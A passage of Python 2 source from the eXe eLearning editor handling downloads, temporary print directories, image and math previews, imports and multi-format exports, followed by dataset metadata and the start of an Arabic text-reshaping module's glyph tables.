client.sendScript('Ext.MessageBox.updateProgress(%f, "%d%%", "Downloading...")' % (float(percent) / 100, percent))
log.info('%3d' % (percent))
def handleSourcesDownload(self, client):
"""
Download taxon sources from url and deploy in $HOME/.exe/classification_sources
"""
url = 'http://forja.cenatic.es/frs/download.php/file/1624/classification_sources.zip'
client.sendScript('Ext.MessageBox.progress("Sources Download", "Connecting to classification sources repository...")')
d = threads.deferToThread(urlretrieve, url, None, lambda n, b, f: self.progressDownload(n, b, f, client))
def successDownload(result):
filename = result[0]
if not zipfile.is_zipfile(filename):
return None
zipFile = zipfile.ZipFile(filename, "r")
try:
zipFile.extractall(G.application.config.configDir)
client.sendScript('Ext.MessageBox.updateProgress(1, "100%", "Success!")')
finally:
Path(filename).remove()
d.addCallback(successDownload)
def handleReload(self, client):
self.location_buttons.updateText()
client.sendScript('eXe.app.gotoUrl()', filter_func=allSessionClients)
def handleRemoveTempDir(self, client, tempdir, rm_top_dir):
"""
Removes a temporary directory and any contents therein
(from the bottom up), and yup, that's all!
#
# swiped from an example on:
# http://docs.python.org/lib/os-file-dir.html
################################################################
# Delete everything reachable from the directory named in 'top',
# assuming there are no symbolic links.
# CAUTION: This is dangerous! For example, if top == '/', it
# could delete all your disk files.
"""
top = tempdir
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
##################################################################
# and finally, go ahead and remove the top-level tempdir itself:
if (int(rm_top_dir) != 0):
os.rmdir(tempdir)
def get_printdir_relative2web(self, exported_dir):
"""
related to the following ClearParentTempPrintDirs(), return a
local URL corresponding to the exported_dir
"""
rel_name = exported_dir[len(G.application.tempWebDir):]
if sys.platform[:3] == "win":
rel_name = rel_name.replace('\\', '/')
if rel_name.startswith('/'):
rel_name = rel_name[1:]
http_relative_pathname = "http://127.0.0.1:" + str(self.config.port) \
+ '/' + rel_name
log.debug('printdir http_relative_pathname=' + http_relative_pathname)
return http_relative_pathname
def ClearParentTempPrintDirs(self, client, log_dir_warnings):
"""
Determine the parent temporary printing directory, and clear them
if safe to do so (i.e., if not the config dir itself, for example)
Makes (if necessary), and clears out (if applicable) the parent
temporary directory.
The calling handleClearAndMakeTempPrintDir() shall then make a
specific print-job subdirectory.
"""
#
# Create the parent temp print dir as hardcoded under the webdir, as:
# http://temp_print_dirs
# (eventually may want to allow this information to be configured by
# the user, stored in globals, etc.)
web_dirname = G.application.tempWebDir
under_dirname = os.path.join(web_dirname,"temp_print_dirs")
clear_tempdir = 0
dir_warnings = ""
# but first need to ensure that under_dirname itself is available;
# if not, create it:
if cmp(under_dirname,"") != 0:
if os.path.exists(under_dirname):
if (os.path.isdir(under_dirname)):
# Yes, this directory already exists.
# pre-clean it, keeping the clutter down:
clear_tempdir = 1
else:
dir_warnings = "WARNING: The desired Temporary Print " \
+ "Directory, \"" + under_dirname \
+ "\", already exists, but as a file!\n"
if log_dir_warnings:
log.warn("ClearParentTempPrintDirs(): The desired " \
+ "Temporary Print Directory, \"%s\", " \
+ "already exists, but as a file!", \
under_dirname)
under_dirname = web_dirname
# but, we can't just put the tempdirs directly underneath
# the webDir, since no server object exists for it.
# So, as a quick and dirty solution, go ahead and put
# them in the images folder:
under_dirname = os.path.join(under_dirname,"images")
dir_warnings += " RECOMMENDATION: please " \
+ "remove/rename this file to allow eXe easier "\
+ "management of its temporary print files.\n"
dir_warnings += " eXe will create the temporary " \
+ "printing directory directly under \"" \
+ under_dirname + "\" instead, but this might "\
+"leave some files around after eXe terminates..."
if log_dir_warnings:
log.warn(" RECOMMENDATION: please remove/rename "\
+ "this file to allow eXe easier management of "\
+ "its temporary print files.")
log.warn(" eXe will create the temporary " \
+ "printing directory directly under \"%s\" " \
+ "instead, but this might leave some files " \
+ "around after eXe terminates...", \
under_dirname)
# and note that we do NOT want to clear_tempdir
# on the config dir itself!!!!!
else:
os.makedirs(under_dirname)
# and while we could clear_tempdir on it, there's no need to.
if clear_tempdir :
# before making this particular print job's temporary print
# directory underneath the now-existing temp_print_dirs,
# go ahead and clear out temp_print_dirs such that we have
# AT MOST one old temporary set of print job files still existing
# once eXe terminates:
rm_topdir = "0"
# note: rm_topdir is passed in as a STRING since
# handleRemoveTempDir expects as such from nevow's
# clientToServerEvent() call:
self.handleRemoveTempDir(client, under_dirname, rm_topdir)
return under_dirname, dir_warnings
def handleClearAndMakeTempPrintDir(self, client, suffix, prefix, \
callback):
"""
Makes a temporary printing directory, and yup, that's pretty much it!
"""
# First get the name of the parent temp directory, after making it
# (if necessary) and clearing (if applicable):
log_dir_warnings = 1
(under_dirname, dir_warnings) = self.ClearParentTempPrintDirs( \
client, log_dir_warnings)
# Next, go ahead and create this particular print job's temporary
# directory under the parent temp directory:
temp_dir = mkdtemp(suffix, prefix, under_dirname)
# Finally, pass the created temp_dir back to the expecting callback:
client.call(callback, temp_dir, dir_warnings)
def handleTinyMCEimageChoice(self, client, tinyMCEwin, tinyMCEwin_name, \
tinyMCEfield, local_filename, preview_filename):
"""
Once an image is selected in the file browser that is spawned by the
TinyMCE image dialog, copy this file (which is local to the user's
machine) into the server space, under a preview directory
(after checking if this exists, and creating it if necessary).
Note that this IS a "cheat", in violation of the client-server
separation, but can be done since we know that the eXe server is
actually sitting on the client host.
"""
server_filename = ""
callback_errors = ""
errors = 0
log.debug('handleTinyMCEimageChoice: image local = ' + local_filename
+ ', base=' + os.path.basename(local_filename))
webDir = Path(G.application.tempWebDir)
previewDir = webDir.joinpath('previews')
if not previewDir.exists():
log.debug("image previews directory does not yet exist; " \
+ "creating as %s " % previewDir)
previewDir.makedirs()
elif not previewDir.isdir():
client.alert( \
_(u'Preview directory %s is a file, cannot replace it') \
% previewDir)
log.error("Couldn't preview tinyMCE-chosen image: "+
"Preview dir %s is a file, cannot replace it" \
% previewDir)
callback_errors = "Preview dir is a file, cannot replace"
errors += 1
if errors == 0:
log.debug('handleTinyMCEimageChoice: originally, local_filename='
+ local_filename)
local_filename = unicode(local_filename, 'utf-8')
log.debug('handleTinyMCEimageChoice: in unicode, local_filename='
+ local_filename)
localImagePath = Path(local_filename)
log.debug('handleTinyMCEimageChoice: after Path, localImagePath= '
+ localImagePath);
if not localImagePath.exists() or not localImagePath.isfile():
client.alert( \
_(u'Local file %s is not found, cannot preview it') \
% localImagePath)
log.error("Couldn't find tinyMCE-chosen image: %s" \
% localImagePath)
callback_errors = "Image file %s not found, cannot preview" \
% localImagePath
errors += 1
try:
# joinpath needs its join arguments to already be in Unicode:
#preview_filename = toUnicode(preview_filename);
# but that's okay, cuz preview_filename is now URI safe, right?
log.debug('URIencoded preview filename=' + preview_filename);
server_filename = previewDir.joinpath(preview_filename);
log.debug("handleTinyMCEimageChoice copying image from \'"\
+ local_filename + "\' to \'" \
+ server_filename.abspath() + "\'.");
shutil.copyfile(local_filename, \
server_filename.abspath());
# new optional description file to provide the
# actual base filename, such that once it is later processed
# copied into the resources directory, it can be done with
# only the basename. Otherwise the resource filenames
# are too long for some users, preventing them from making
# backup CDs of the content, for example.
#
# Remember that the full path of the
# file is only used here as an easy way to keep the names
# unique WITHOUT requiring a roundtrip call from the Javascript
# to this server, and back again, a process which does not
# seem to work with tinyMCE in the mix. BUT, once tinyMCE's
# part is done, and this image processed, it can be returned
# to just its basename, since the resource parts have their
# own unique-ification mechanisms already in place.
descrip_file_path = Path(server_filename+".exe_info")
log.debug("handleTinyMCEimageChoice creating preview " \
+ "description file \'" \
+ descrip_file_path.abspath() + "\'.");
descrip_file = open(descrip_file_path, 'wb')
# safety measures against TinyMCE, otherwise it will
# later take ampersands and entity-escape them into '&',
# and filenames with hash signs will not be found, etc.:
unspaced_filename = local_filename.replace(' ','_')
unhashed_filename = unspaced_filename.replace('#', '_num_')
unamped_local_filename = unhashed_filename.replace('&', '_and_')
log.debug("and setting new file basename as: "
+ unamped_local_filename);
my_basename = os.path.basename(unamped_local_filename)
descrip_file.write((u"basename="+my_basename).encode('utf-8'))
descrip_file.flush()
descrip_file.close()
except Exception, e:
client.alert(_('SAVE FAILED!\n%s') % str(e))
log.error("handleTinyMCEimageChoice unable to copy local image "\
+"file to server prevew, error = " + str(e))
raise
def handleTinyMCEmath(self, client, tinyMCEwin, tinyMCEwin_name, \
tinyMCEfield, latex_source, math_fontsize, \
preview_image_filename, preview_math_srcfile):
"""
Based off of handleTinyMCEimageChoice(),
handleTinyMCEmath() is similar in that it places a .gif math image
(and a corresponding .tex LaTeX source file) into the previews dir.
Rather than copying the image from a user-selected directory, though,
this routine actually generates the math image using mimetex.
"""
server_filename = ""
callback_errors = ""
errors = 0
webDir = Path(G.application.tempWebDir)
previewDir = webDir.joinpath('previews')
if not previewDir.exists():
log.debug("image previews directory does not yet exist; " \
+ "creating as %s " % previewDir)
previewDir.makedirs()
elif not previewDir.isdir():
client.alert( \
_(u'Preview directory %s is a file, cannot replace it') \
% previewDir)
log.error("Couldn't preview tinyMCE-chosen image: "+
"Preview dir %s is a file, cannot replace it" \
% previewDir)
callback_errors = "Preview dir is a file, cannot replace"
errors += 1
#if errors == 0:
# localImagePath = Path(local_filename)
# if not localImagePath.exists() or not localImagePath.isfile():
# client.alert( \
# _(u'Image file %s is not found, cannot preview it') \
# % localImagePath)
# log.error("Couldn't find tinyMCE-chosen image: %s" \
# % localImagePath)
# callback_errors = "Image file %s not found, cannot preview" \
# % localImagePath
# errors += 1
# the mimetex usage code was swiped from the Math iDevice:
if latex_source <> "":
# first write the latex_source out into the preview_math_srcfile,
# such that it can then be passed into the compile command:
math_filename = previewDir.joinpath(preview_math_srcfile)
math_filename_str = math_filename.abspath().encode('utf-8')
log.info("handleTinyMCEmath: using LaTeX source: " + latex_source)
log.debug("writing LaTeX source into \'" \
+ math_filename_str + "\'.")
math_file = open(math_filename, 'wb')
# do we need to append a \n here?:
math_file.write(latex_source)
math_file.flush()
math_file.close()
try:
use_latex_sourcefile = math_filename_str
tempFileName = compile(use_latex_sourcefile, math_fontsize, \
latex_is_file=True)
except Exception, e:
client.alert(_('MimeTeX compile failed!\n%s') % str(e))
log.error("handleTinyMCEmath unable to compile LaTeX using "\
+"mimetex, error = " + str(e))
raise
# copy the file into previews
server_filename = previewDir.joinpath(preview_image_filename);
log.debug("handleTinyMCEmath copying math image from \'"\
+ tempFileName + "\' to \'" \
+ server_filename.abspath().encode('utf-8') + "\'.");
shutil.copyfile(tempFileName, \
server_filename.abspath().encode('utf-8'));
# Delete the temp file made by compile
Path(tempFileName).remove()
return
def getResources(self,dirname,html,client):
Resources.cancel = False
self.importresources = Resources(dirname,self.package.findNode(client.currentNodeId),client)
# import cProfile
# import lsprofcalltree
# p = cProfile.Profile()
# p.runctx( "resources.insertNode()",globals(),locals())
# k = lsprofcalltree.KCacheGrind(p)
# data = open('exeprof.kgrind', 'w+')
# k.output(data)
# data.close()
self.importresources.insertNode([html.partition(dirname + os.sep)[2]])
def handleImport(self, client, importType, path, html=None):
if importType == 'html':
if (not html):
client.call('eXe.app.getController("Toolbar").importHtml2', path)
else:
d = threads.deferToThread(self.getResources, path, html, client)
d.addCallback(self.handleImportCallback, client)
d.addErrback(self.handleImportErrback, client)
client.call('eXe.app.getController("Toolbar").initImportProgressWindow', _(u'Importing HTML...'))
if importType.startswith('lom'):
try:
setattr(self.package, importType, lomsubs.parse(path))
client.call('eXe.app.getController("MainTab").lomImportSuccess', importType)
except Exception, e:
client.alert(_('LOM Metadata import FAILED!\n%s') % str(e))
def handleImportErrback(self, failure, client):
client.alert(_(u'Error importing HTML:\n') + unicode(failure.getBriefTraceback()), \
(u'eXe.app.gotoUrl("/%s")' % self.package.name).encode('utf8'), filter_func=otherSessionPackageClients)
def handleImportCallback(self,resources,client):
client.call('eXe.app.getController("Toolbar").closeImportProgressWindow')
client.sendScript((u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=allSessionPackageClients)
def handleCancelImport(self, client):
log.info('Cancel import')
Resources.cancelImport()
def handleExport(self, client, exportType, filename):
"""
Called by js.
Exports the current package to one of the above formats
'exportType' can be one of 'singlePage' 'webSite' 'zipFile'
'textFile' or 'scorm'
'filename' is a file for scorm pages, and a directory for websites
"""
webDir = Path(self.config.webDir)
#stylesDir = webDir.joinpath('style', self.package.style)
stylesDir = self.config.stylesDir/self.package.style
filename = Path(filename, 'utf-8')
exportDir = Path(filename).dirname()
if exportDir and not exportDir.exists():
client.alert(_(u'Cannot access directory named ') +
unicode(exportDir) +
_(u'. Please use ASCII names.'))
return
"""
adding the print feature in using the same export functionality:
"""
if exportType == 'singlePage' or exportType == 'printSinglePage':
printit = 0
if exportType == 'printSinglePage':
printit = 1
exported_dir = self.exportSinglePage(client, filename, webDir, \
stylesDir, printit)
if printit == 1 and not exported_dir is None:
web_printdir = self.get_printdir_relative2web(exported_dir)
G.application.config.browser.open(web_printdir)
elif exportType == 'webSite':
self.exportWebSite(client, filename, stylesDir)
elif exportType == 'csvReport':
self.exportReport(client, filename, stylesDir)
elif exportType == 'zipFile':
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportWebZip(client, filename, stylesDir)
elif exportType == 'textFile':
self.exportText(client, filename)
elif exportType == 'scorm1.2':
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "scorm1.2")
elif exportType == "scorm2004":
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "scorm2004")
elif exportType == "agrega":
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "agrega")
elif exportType == 'epub3':
filename = self.b4save(client, filename, '.epub', _(u'EXPORT FAILED!'))
self.exportEpub3(client, filename, stylesDir)
elif exportType == "commoncartridge":
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "commoncartridge")
elif exportType == 'mxml':
self.exportXML(client, filename, stylesDir)
else:
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportIMS(client, filename, stylesDir)
def handleQuit(self, client):
"""
Stops the server
"""
# first, go ahead and clear out any temp job files still in
# the temporary print directory:
log_dir_warnings = 0
# don't warn of any issues with the directories at quit,
# since already warned at initial directory creation
(parent_temp_print_dir, dir_warnings) = \
self.ClearParentTempPrintDirs(client, log_dir_warnings)
client.close("window.location = \"quit\";")
if len(self.clientHandleFactory.clientHandles) <= 1:
self.webServer.monitoring = False
G.application.config.configParser.set('user', 'lastDir', G.application.config.lastDir)
try:
shutil.rmtree(G.application.tempWebDir, True)
shutil.rmtree(G.application.resourceDir, True)
except:
log.debug('Don\'t delete temp directorys. ')
reactor.callLater(2, reactor.stop)
else:
log.debug("Not quiting. %d clients alive." % len(self.clientHandleFactory.clientHandles))
def handleBrowseURL(self, client, url):
"""visit the specified URL using the system browser
if the URL contains %s, substitute the local webDir
if the URL contains %t, show a temp file containing NEWS and README """
if url.find('%t') > -1:
release_notes = os.path.join(G.application.tempWebDir,
'Release_Notes.html')
f = open(release_notes, 'wt')
f.write('''<html><head><title>eXe Release Notes</title></head>
<body><h1>News</h1><pre>\n''')
try:
news = open(os.path.join(self.config.webDir, 'NEWS'),
'rt').read()
readme = open(os.path.join(self.config.webDir, 'README'),
'rt').read()
f.write(news)
f.write('</pre><hr><h1>Read Me</h1><pre>\n')
f.write(readme)
except IOError:
# fail silently if we can't read either of the files
pass
f.write('</pre></body></html>')
f.close()
url = url.replace('%t', release_notes)
else:
url = url.replace('%s', self.config.webDir)
log.debug(u'browseURL: ' + url)
if hasattr(os, 'startfile'):
os.startfile(url)
else:
G.application.config.browser.open(url, new=True)
def handleMergeXliffPackage(self, client, filename, from_source):
"""
Parse the XLIFF file and import the contents based on
translation-unit id-s
"""
from_source = True if from_source == "true" else False
try:
importer = XliffImport(self.package, unquote(filename))
importer.parseAndImport(from_source)
client.alert(_(u'Correct XLIFF import'), (u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=otherSessionPackageClients)
except Exception,e:
client.alert(_(u'Error importing XLIFF: %s') % e, (u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=otherSessionPackageClients)
def handleInsertPackage(self, client, filename):
"""
Load the package and insert in current node
"""
package = self._loadPackage(client, filename, newLoad=True)
tmpfile = Path(tempfile.mktemp())
package.save(tmpfile)
loadedPackage = self._loadPackage(client, tmpfile, newLoad=False,
destinationPackage=self.package)
newNode = loadedPackage.root.copyToPackage(self.package,
self.package.currentNode)
# trigger a rename of all of the internal nodes and links,
# and to add any such anchors into the dest package via isMerge:
newNode.RenamedNodePath(isMerge=True)
try:
tmpfile.remove()
except:
pass
client.sendScript((u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=allSessionPackageClients)
def handleExtractPackage(self, client, filename, existOk):
"""
Create a new package consisting of the current node and export
'existOk' means the user has been informed of existance and ok'd it
"""
filename = Path(filename, 'utf-8')
saveDir = filename.dirname()
if saveDir and not saveDir.exists():
client.alert(_(u'Cannot access directory named ') + unicode(saveDir) + _(u'. Please use ASCII names.'))
return
# Add the extension if its not already there
if not filename.lower().endswith('.elp'):
filename += '.elp'
if Path(filename).exists() and existOk != 'true':
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXTRACT FAILED!\n%s') % msg)
return
try:
# Create a new package for the extracted nodes
newPackage = self.package.extractNode()
# trigger a rename of all of the internal nodes and links,
# and to remove any old anchors from the dest package,
# and remove any zombie links via isExtract:
newNode = newPackage.root
if newNode:
newNode.RenamedNodePath(isExtract=True)
# Save the new package
newPackage.save(filename)
except Exception, e:
client.alert(_('EXTRACT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Package extracted to: %s') % filename)
def handleCreateDir(self, client, currentDir, newDir):
try:
d = Path(currentDir, 'utf-8') / newDir
d.makedirs()
client.sendScript(u"""eXe.app.getStore('filepicker.DirectoryTree').load({
callback: function() {
eXe.app.fireEvent( "dirchange", %s );
}
})""" % json.dumps(d))
except OSError:
client.alert(_(u"Directory exists"))
except:
log.exception("")
# Public Methods
"""
Exports to Ustad Mobile XML
"""
def exportXML(self, client, filename, stylesDir):
try:
xmlExport = XMLExport(self.config, stylesDir, filename)
xmlExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
def exportSinglePage(self, client, filename, webDir, stylesDir, \
printFlag):
"""
Export 'client' to a single web page,
'webDir' is just read from config.webDir
'stylesDir' is where to copy the style sheet information from
'printFlag' indicates whether or not this is for print
(and whatever else that might mean)
"""
try:
imagesDir = webDir.joinpath('images')
scriptsDir = webDir.joinpath('scripts')
cssDir = webDir.joinpath('css')
templatesDir = webDir.joinpath('templates')
# filename is a directory where we will export the website to
# We assume that the user knows what they are doing
# and don't check if the directory is already full or not
# and we just overwrite what's already there
filename = Path(filename)
# Append the package name to the folder path if necessary
if filename.basename() != self.package.name:
filename /= self.package.name
if not filename.exists():
filename.makedirs()
elif not filename.isdir():
client.alert(_(u'Filename %s is a file, cannot replace it') %
filename)
log.error("Couldn't export web page: "+
"Filename %s is a file, cannot replace it" % filename)
return
else:
client.alert(_(u'Folder name %s already exists. '
'Please choose another one or delete existing one then try again.') % filename)
return
# Now do the export
singlePageExport = SinglePageExport(stylesDir, filename, \
imagesDir, scriptsDir, cssDir, templatesDir)
singlePageExport.export(self.package, printFlag)
except Exception, e:
client.alert(_('SAVE FAILED!\n%s') % str(e))
raise
# Show the newly exported web site in a new window
if not printFlag:
self._startFile(filename)
if client:
client.alert(_(u'Exported to %s') % filename)
# and return a string of the actual directory name,
# in case the package name was added, etc.:
return filename.abspath().encode('utf-8')
# WARNING: the above only returns the RELATIVE pathname
def exportWebSite(self, client, filename, stylesDir):
"""
Export 'client' to a web site,
'webDir' is just read from config.webDir
'stylesDir' is where to copy the style sheet information from
"""
try:
# filename is a directory where we will export the website to
# We assume that the user knows what they are doing
# and don't check if the directory is already full or not
# and we just overwrite what's already there
filename = Path(filename)
# Append the package name to the folder path if necessary
if filename.basename() != self.package.name:
filename /= self.package.name
if not filename.exists():
filename.makedirs()
elif not filename.isdir():
if client:
client.alert(_(u'Filename %s is a file, cannot replace it') %
filename)
log.error("Couldn't export web page: "+
"Filename %s is a file, cannot replace it" % filename)
return
else:
if client:
client.alert(_(u'Folder name %s already exists. '
'Please choose another one or delete existing one then try again.') % filename)
return
# Now do the export
websiteExport = WebsiteExport(self.config, stylesDir, filename)
websiteExport.export(self.package)
except Exception, e:
if client:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
if client:
client.alert(_(u'Exported to %s') % filename)
# Show the newly exported web site in a new window
self._startFile(filename)
def exportWebZip(self, client, filename, stylesDir):
try:
log.debug(u"exportWebsite, filename=%s" % filename)
filename = Path(filename)
# Do the export
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
websiteExport = WebsiteExport(self.config, stylesDir, filename)
websiteExport.exportZip(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportText(self, client, filename):
try:
filename = Path(filename)
log.debug(u"exportWebsite, filename=%s" % filename)
# Append an extension if required
if not filename.lower().endswith('.txt'):
filename += '.txt'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s') % msg)
return
# Do the export
textExport = TextExport(filename)
textExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def handleXliffExport(self, client, filename, source, target, copy, cdata):
"""
Exports this package to a XLIFF file
"""
copy = True if copy == "true" else False
cdata = True if cdata == "true" else False
try:
filename = Path(unquote(filename))
log.debug(u"exportXliff, filename=%s" % filename)
if not filename.lower().endswith('.xlf'):
filename += '.xlf'
xliffExport = XliffExport(self.config, filename, source, target, copy, cdata)
xliffExport.export(self.package)
except Exception,e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportScorm(self, client, filename, stylesDir, scormType):
"""
Exports this package to a scorm package file
"""
try:
filename = Path(filename)
log.debug(u"exportScorm, filename=%s" % filename)
# Append an extension if required
if not filename.lower().endswith('.zip'):
filename += '.zip'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s') % msg)
return
# Do the export
scormExport = ScormExport(self.config, stylesDir, filename, scormType)
scormExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportEpub3(self, client, filename, stylesDir):
try:
log.debug(u"exportEpub3, filename=%s" % filename)
filename = Path(filename)
# Do the export
filename = self.b4save(client, filename, '.epub', _(u'EXPORT FAILED!'))
epub3Export = Epub3Export(self.config, stylesDir, filename)
epub3Export.export(self.package)
# epub3Export.exportZip(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s' % str(e)))
raise
client.alert(_(u'Exported to %s') % filename)
def exportReport(self, client, filename, stylesDir):
"""
Generates this package report to a file
"""
try:
log.debug(u"exportReport")
# Append an extension if required
if not filename.lower().endswith('.csv'):
filename += '.csv'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s' % msg))
return
# Do the export
websiteExport = WebsiteExport(self.config, stylesDir, filename, report=True)
websiteExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s' % str(e)))
raise
client.alert(_(u'Exported to %s' % filename))
def exportIMS(self, client, filename, stylesDir):
"""
Exports this package to a ims package file
"""
try:
log.debug(u"exportIMS")
# Append an extension if required
if not filename.lower().endswith('.zip'):
filename += '.zip'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s') % msg)
return
# Do the export
imsExport = IMSExport(self.config, stylesDir, filename)
imsExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
# Utility methods
def _startFile(self, filename):
"""
Launches an exported web site or page
"""
if hasattr(os, 'startfile'):
try:
os.startfile(filename)
except UnicodeEncodeError:
os.startfile(filename.encode(Path.fileSystemEncoding))
else:
filename /= 'index.html'
G.application.config.browser.open('file://'+filename)
def _loadPackage(self, client, filename, newLoad=True,
destinationPackage=None):
"""Load the package named 'filename'"""
try:
encoding = sys.getfilesystemencoding()
if encoding is None:
encoding = 'utf-8'
filename2 = toUnicode(filename, encoding)
log.debug("filename and path" + filename2)
# see if the file exists AND is readable by the user
try:
open(filename2, 'rb').close()
except IOError:
filename2 = toUnicode(filename, 'utf-8')
try:
open(filename2, 'rb').close()
except IOError:
client.alert(_(u'File %s does not exist or is not readable.') % filename2)
return None
package = Package.load(filename2, newLoad, destinationPackage)
if package is None:
raise Exception(_("Couldn't load file, please email file to bugs@exelearning.org"))
except Exception, exc:
if log.getEffectiveLevel() == logging.DEBUG:
client.alert(_(u'Sorry, wrong file format:\n%s') % unicode(exc))
else:
client.alert(_(u'Sorry, wrong file format'))
log.error(u'Error loading package "%s": %s' % (filename2, unicode(exc)))
log.error(u'Traceback:\n%s' % traceback.format_exc())
raise
return package
|
tquilian/exeNext
|
exe/jsui/mainpage.py
|
Python
|
gpl-2.0
| 57,162
|
[
"VisIt"
] |
5d8a17fb4f42e47afeda4cdd1eb57a603fc4c27e8264e3c9fdac67e3ee9e2b94
|
# -*- coding: utf-8 -*-
# Ported and tweaked from Java to Python, from Better Arabic Reshaper [https://github.com/agawish/Better-Arabic-Reshaper/]
# This work is licensed under the GNU Public License (GPL).
# To view a copy of this license, visit http://www.gnu.org/copyleft/gpl.html
# Written by Abd Allah Diab (mpcabd)
# Written by faisal oead
import re
DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_MDD = u'\u0622'
DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_HAMAZA = u'\u0623'
DEFINED_CHARACTERS_ORGINAL_ALF_LOWER_HAMAZA = u'\u0625'
DEFINED_CHARACTERS_ORGINAL_ALF = u'\u0627'
DEFINED_CHARACTERS_ORGINAL_LAM = u'\u0644'
LAM_ALEF_GLYPHS = [
[u'\u0622', u'\uFEF6', u'\uFEF5'],
[u'\u0623', u'\uFEF8', u'\uFEF7'],
[u'\u0627', u'\uFEFC', u'\uFEFB'],
[u'\u0625', u'\uFEFA', u'\uFEF9']
]
HARAKAT = [
u'\u0600', u'\u0601', u'\u0602', u'\u0603', u'\u0606', u'\u0607', u'\u0608', u'\u0609',
u'\u060A', u'\u060B', u'\u060D', u'\u060E', u'\u0610', u'\u0611', u'\u0612', u'\u0613',
u'\u0614', u'\u0615', u'\u0616', u'\u0617', u'\u0618', u'\u0619', u'\u061A', u'\u061B',
u'\u061E', u'\u061F', u'\u0621', u'\u063B', u'\u063C', u'\u063D', u'\u063E', u'\u063F',
u'\u0640', u'\u064B', u'\u064C', u'\u064D', u'\u064E', u'\u064F', u'\u0650', u'\u0651',
u'\u0652', u'\u0653', u'\u0654', u'\u0655', u'\u0656', u'\u0657', u'\u0658', u'\u0659',
u'\u065A', u'\u065B', u'\u065C', u'\u065D', u'\u065E', u'\u0660', u'\u066A', u'\u066B',
u'\u066C', u'\u066F', u'\u0670', u'\u0672', u'\u06D4', u'\u06D5', u'\u06D6', u'\u06D7',
u'\u06D8', u'\u06D9', u'\u06DA', u'\u06DB', u'\u06DC', u'\u06DF', u'\u06E0', u'\u06E1',
u'\u06E2', u'\u06E3', u'\u06E4', u'\u06E5', u'\u06E6', u'\u06E7', u'\u06E8', u'\u06E9',
u'\u06EA', u'\u06EB', u'\u06EC', u'\u06ED', u'\u06EE', u'\u06EF', u'\u06D6', u'\u06D7',
u'\u06D8', u'\u06D9', u'\u06DA', u'\u06DB', u'\u06DC', u'\u06DD', u'\u06DE', u'\u06DF',
u'\u06F0', u'\u06FD', u'\uFE70', u'\uFE71', u'\uFE72', u'\uFE73', u'\uFE74', u'\uFE75',
u'\uFE76', u'\uFE77', u'\uFE78', u'\uFE79', u'\uFE7A', u'\uFE7B', u'\uFE7C', u'\uFE7D',
u'\uFE7E', u'\uFE7F', u'\uFC5E', u'\uFC5F', u'\uFC60', u'\uFC61', u'\uFC62', u'\uFC63'
]
ARABIC_GLYPHS = {
u'\u0622' : [u'\u0622', u'\uFE81', u'\uFE81', u'\uFE82', u'\uFE82', 2],
u'\u0623' : [u'\u0623', u'\uFE83', u'\uFE83', u'\uFE84', u'\uFE84', 2],
u'\u0624' : [u'\u0624', u'\uFE85', u'\uFE85', u'\uFE86', u'\uFE86', 2],
u'\u0625' : [u'\u0625', u'\uFE87', u'\uFE87', u'\uFE88', u'\uFE88', 2],
u'\u0626' : [u'\u0626', u'\uFE89', u'\uFE8B', u'\uFE8C', u'\uFE8A', 4],
u'\u0627' : [u'\u0627', u'\u0627', u'\u0627', u'\uFE8E', u'\uFE8E', 2],
u'\u0628' : [u'\u0628', u'\uFE8F', u'\uFE91', u'\uFE92', u'\uFE90', 4],
u'\u0629' : [u'\u0629', u'\uFE93', u'\uFE93', u'\uFE94', u'\uFE94', 2],
u'\u062A' : [u'\u062A', u'\uFE95', u'\uFE97', u'\uFE98', u'\uFE96', 4],
u'\u062B' : [u'\u062B', u'\uFE99', u'\uFE9B', u'\uFE9C', u'\uFE9A', 4],
u'\u062C' : [u'\u062C', u'\uFE9D', u'\uFE9F', u'\uFEA0', u'\uFE9E', 4],
